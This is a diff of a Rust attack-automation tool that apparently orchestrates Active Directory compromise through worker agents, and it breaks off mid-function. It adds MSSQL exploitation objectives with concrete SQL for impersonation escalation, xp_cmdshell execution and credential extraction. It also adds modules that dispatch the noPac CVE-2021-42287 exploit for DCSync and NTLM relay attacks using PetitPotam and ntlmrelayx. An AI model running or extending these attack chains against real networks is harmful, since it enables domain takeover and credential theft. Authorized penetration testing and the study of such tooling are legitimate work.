+ #[tokio::test]
+ async fn collect_no_vulns_with_creds_returns_nothing() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_mssql_access_vuln_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ assert_eq!(work[0].listener, "192.168.58.100");
+ assert_eq!(work[0].dedup_key, "mssql_coerce:192.168.58.22");
+ assert_eq!(work[0].credential.username, "sa");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_skips_non_mssql_vulns() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "smb_signing_disabled",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_skips_already_processed() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into());
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_target_ip_falls_back_to_vuln_target() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln("v1", "mssql_access", "192.168.58.30", json!({})),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.30");
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_target_ip() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln("v1", "mssql_access", "", json!({"target_ip": ""})),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_prefers_domain_matching_credential() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("admin", "fabrikam.local"));
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "sa");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_first_cred_when_no_domain_match() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("admin", "fabrikam.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_first_cred_when_domain_empty() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "sa");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_vulns_produce_multiple_work_items() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_vuln(
+ "v2",
+ "mssql_access",
+ "192.168.58.23",
+ json!({"target_ip": "192.168.58.23", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 2);
+ let ips: std::collections::HashSet<&str> =
+ work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains("192.168.58.22"));
+ assert!(ips.contains("192.168.58.23"));
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_vuln_type() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "MSSQL_ACCESS",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_domain_matching() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "CONTOSO.LOCAL"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "sa");
+ }
+
+ #[tokio::test]
+ async fn collect_partial_dedup_only_skips_processed() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_vuln(
+ "v2",
+ "mssql_access",
+ "192.168.58.23",
+ json!({"target_ip": "192.168.58.23"}),
+ ),
+ );
+ state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into());
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.23");
+ }
+
+ #[tokio::test]
+ async fn collect_listener_propagated_to_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].listener, "192.168.58.50");
+ }
+
+ #[tokio::test]
+ async fn collect_mixed_vuln_types_only_mssql_access() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_vuln(
+ "v2",
+ "constrained_delegation",
+ "192.168.58.23",
+ json!({"target_ip": "192.168.58.23"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v3".into(),
+ make_vuln(
+ "v3",
+ "mssql_impersonation",
+ "192.168.58.24",
+ json!({"target_ip": "192.168.58.24"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ }
+
+ #[tokio::test]
+ async fn collect_vuln_with_empty_target_and_no_detail_ip_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln("v1", "mssql_access", "", json!({"domain": "contoso.local"})),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
index 8c2ab558..aeaea38b 100644
--- a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
@@ -21,7 +21,7 @@ use tracing::{debug, info, warn};
use crate::orchestrator::dispatcher::Dispatcher;
/// Dedup key prefix for MSSQL deep exploitation.
-const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
+pub(crate) const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
/// Monitors for exploited MSSQL vulns and dispatches follow-up exploitation.
/// Interval: 30s.
@@ -83,8 +83,18 @@ pub async fn auto_mssql_exploitation(
.to_string();
// Find a credential for MSSQL access.
- // Prefer creds for the target domain, fall back to any cred.
- let credential = state
+ // When the target domain is known, prefer a credential from
+ // that domain (cross-forest NTLM auth otherwise falls through
+ // to Guest, e.g. jdoe@contoso.local → FABRIKAM\Guest on
+ // fabrikam.local SQLEXPRESS).
+ //
+ // For `mssql_linked_server` vulns, fall back to a trusted-domain
+ // credential when no same-domain cred exists: the link hop
+ // executes via stored login mapping on the remote side, so
+ // any cred that authenticates to the source server is fine
+ // (e.g., a child cred lands on sql-link01, then EXEC AT
+ // [SQL01] runs as fabrikam\sql_svc via the stored mapping).
+ let same_domain = state
.credentials
.iter()
.find(|c| {
@@ -93,13 +103,21 @@ pub async fn auto_mssql_exploitation(
&& (domain.is_empty()
|| c.domain.to_lowercase() == domain.to_lowercase())
})
- .or_else(|| {
- state.credentials.iter().find(|c| {
- !c.password.is_empty()
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- })
.cloned();
+ let credential = same_domain.or_else(|| {
+ if domain.is_empty() {
+ state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned()
+ } else {
+ state.find_trust_credential(&domain)
+ }
+ });
if credential.is_none() {
debug!(
@@ -142,9 +160,17 @@ pub async fn auto_mssql_exploitation(
"objectives": [
"Enable xp_cmdshell and execute whoami to confirm code execution",
"Try EXECUTE AS LOGIN = 'sa' if current user is not sysadmin",
+ "Enumerate ALL impersonation privileges: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'",
+ "For each impersonatable login, try EXECUTE AS LOGIN = '' and check IS_SRVROLEMEMBER('sysadmin')",
+ "Check database-level impersonation: SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE'",
+ "Try EXECUTE AS USER = 'dbo' in each database (master, msdb, tempdb) for db_owner escalation",
+ "Check if any database has TRUSTWORTHY = ON: SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1",
"Extract credentials via xp_cmdshell (e.g., whoami /priv, reg query for autologon)",
"Check for SeImpersonatePrivilege for potato escalation",
- "Enumerate linked servers for lateral movement",
+ "Enumerate linked servers and test RPC execution on each link",
+ "Check who is sysadmin: SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1",
+ "For cross-forest linked-server pivots: enumerate SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id; — if `is_rpc_out_enabled=1` and `uses_self_credential=0`, use `mssql_openquery` (rides stored login mapping, bypasses double-hop)",
+ "If `mssql_exec_linked` fails on a cross-forest link with auth errors, retry with `impersonate_user='sa'` to wrap the hop in `EXECUTE AS LOGIN`, or switch to `mssql_openquery`",
],
});
@@ -192,7 +218,7 @@ struct MssqlDeepWork {
/// MSSQL exploitation (follow-up on confirmed MSSQL access).
pub(crate) fn is_mssql_deep_candidate(vuln_type: &str) -> bool {
let vtype = vuln_type.to_lowercase();
- vtype == "mssql_access" || vtype == "mssql_linked_server"
+ vtype == "mssql_access" || vtype == "mssql_linked_server" || vtype == "mssql_impersonation"
}
/// Extract the target IP from vulnerability details, with fallbacks.
@@ -227,11 +253,12 @@ mod tests {
assert!(is_mssql_deep_candidate("MSSQL_ACCESS"));
assert!(is_mssql_deep_candidate("mssql_linked_server"));
assert!(is_mssql_deep_candidate("MSSQL_LINKED_SERVER"));
+ assert!(is_mssql_deep_candidate("mssql_impersonation"));
+ assert!(is_mssql_deep_candidate("MSSQL_IMPERSONATION"));
}
#[test]
fn is_mssql_deep_candidate_negative() {
- assert!(!is_mssql_deep_candidate("mssql_impersonation"));
assert!(!is_mssql_deep_candidate("rbcd"));
assert!(!is_mssql_deep_candidate("esc1"));
assert!(!is_mssql_deep_candidate(""));
diff --git a/ares-cli/src/orchestrator/automation/nopac.rs b/ares-cli/src/orchestrator/automation/nopac.rs
new file mode 100644
index 00000000..dac662c2
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/nopac.rs
@@ -0,0 +1,384 @@
+//! auto_nopac -- exploit CVE-2021-42287/CVE-2021-42278 (noPac / SamAccountName
+//! spoofing) when conditions are met.
+//!
+//! noPac creates a computer account, renames it to match a DC, requests a TGT,
+//! then restores the name. The TGT now impersonates the DC, enabling DCSync.
+//! Requires: valid domain credentials, MAQ > 0 (default 10), unpatched DCs.
+//!
+//! The worker has a `nopac` tool that wraps the full chain.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect noPac work items from state (pure logic, no async).
+fn collect_nopac_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ // Skip domains we already dominate -- noPac is pointless if we have krbtgt
+ if state.dominated_domains.contains(&domain.to_lowercase()) {
+ continue;
+ }
+
+ // Find a credential for this domain
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ let dedup_key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip);
+ if state.is_processed(DEDUP_NOPAC, &dedup_key) {
+ continue;
+ }
+
+ items.push(NopacWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Monitors for noPac exploitation opportunities.
+/// Dispatches against each DC+credential pair once.
+/// Interval: 45s (low-priority CVE check).
+pub async fn auto_nopac(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("nopac") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_nopac_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "nopac",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("nopac");
+ match dispatcher
+ .throttled_submit("exploit", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ dc = %item.dc_ip,
+ domain = %item.domain,
+ "noPac (CVE-2021-42287) exploitation dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_NOPAC, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_NOPAC, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(dc = %item.dc_ip, "noPac task deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch noPac");
+ }
+ }
+ }
+ }
+}
+
+struct NopacWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("nopac:{}:{}", "contoso.local", "192.168.58.10");
+ assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!(
+ "nopac:{}:{}",
+ "CONTOSO.LOCAL".to_lowercase(),
+ "192.168.58.10"
+ );
+ assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_NOPAC, "nopac");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "nopac",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "nopac");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = NopacWork {
+ dedup_key: "nopac:contoso.local:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "nopac:contoso.local:192.168.58.10");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn dedup_key_case_normalization() {
+ let domain = "CONTOSO.LOCAL";
+ let dc_ip = "192.168.58.10";
+ let key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip);
+ assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+
+ let domain2 = "Fabrikam.Local";
+ let key2 = format!("nopac:{}:{}", domain2.to_lowercase(), "192.168.58.20");
+ assert_eq!(key2, "nopac:fabrikam.local:192.168.58.20");
+ }
+
+ // --- collect_nopac_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_nopac_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].dedup_key, "nopac:contoso.local:192.168.58.10");
+ }
+
+ #[test]
+ fn collect_skips_dominated_domain() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.dominated_domains.insert("contoso.local".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_no_matching_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Credential for different domain, noPac requires exact domain match
+ state.credentials.push(make_cred("admin", "fabrikam.local"));
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_NOPAC, "nopac:contoso.local:192.168.58.10".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_nopac_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_match() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_nopac_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn domain_matching_for_credential_selection() {
+ let cred_contoso = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let cred_fabrikam = ares_core::models::Credential {
+ id: "c2".into(),
+ username: "fabadmin".into(),
+ password: "FabPass!".into(), // pragma: allowlist secret
+ domain: "fabrikam.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let creds = [cred_contoso, cred_fabrikam];
+ let target_domain = "fabrikam.local";
+
+ let matched = creds
+ .iter()
+ .find(|c| c.domain.to_lowercase() == target_domain.to_lowercase());
+ assert!(matched.is_some());
+ assert_eq!(matched.unwrap().username, "fabadmin");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/ntlm_relay.rs b/ares-cli/src/orchestrator/automation/ntlm_relay.rs
new file mode 100644
index 00000000..75e57b1b
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/ntlm_relay.rs
@@ -0,0 +1,850 @@
+//! auto_ntlm_relay -- orchestrate NTLM relay attacks when conditions are met.
+//!
+//! NTLM relay requires two sides: a relay listener (ntlmrelayx) and a coercion
+//! trigger (PetitPotam, PrinterBug, scheduled task bots). This module dispatches
+//! relay attacks when:
+//!
+//! 1. SMB signing is disabled on a target (relay destination)
+//! 2. An ADCS web enrollment endpoint exists (ESC8 relay target)
+//! 3. We have credentials to trigger coercion or a known coercion source
+//!
+//! The worker agent coordinates ntlmrelayx + coercion within a single task.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Dedup key prefix for relay attacks.
+const DEDUP_SET: &str = DEDUP_NTLM_RELAY;
+
+/// Monitors for NTLM relay opportunities and dispatches relay attacks.
+/// Interval: 30s.
+pub async fn auto_ntlm_relay(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("ntlm_relay") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_relay_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = match &item.relay_type {
+ RelayType::SmbToLdap => json!({
+ "technique": "ntlm_relay_ldap",
+ "relay_target": item.relay_target,
+ "listener_ip": item.listener,
+ "coercion_source": item.coercion_source,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ }),
+ RelayType::Esc8 { ca_name, domain } => json!({
+ "technique": "ntlm_relay_adcs",
+ "relay_target": item.relay_target,
+ "listener_ip": item.listener,
+ "ca_name": ca_name,
+ "domain": domain,
+ "coercion_source": item.coercion_source,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ }),
+ };
+
+ let priority = dispatcher.effective_priority("ntlm_relay");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ relay_target = %item.relay_target,
+ relay_type = %item.relay_type,
+ "NTLM relay attack dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SET, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SET, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(relay = %item.relay_target, "NTLM relay task deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, relay = %item.relay_target, "Failed to dispatch NTLM relay");
+ }
+ }
+ }
+ }
+}
+
+/// Collect relay work items from current state.
+///
+/// Pure logic extracted from `auto_ntlm_relay` so it can be unit-tested without
+/// needing a `Dispatcher` or async runtime (beyond state construction).
+fn collect_relay_work(
+ state: &crate::orchestrator::state::StateInner,
+ listener: &str,
+) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Path 1: Relay to hosts with SMB signing disabled → LDAP shadow creds / RBCD
+ for vuln in state.discovered_vulnerabilities.values() {
+ if vuln.vuln_type.to_lowercase() != "smb_signing_disabled" {
+ continue;
+ }
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+
+ let target_ip = vuln
+ .details
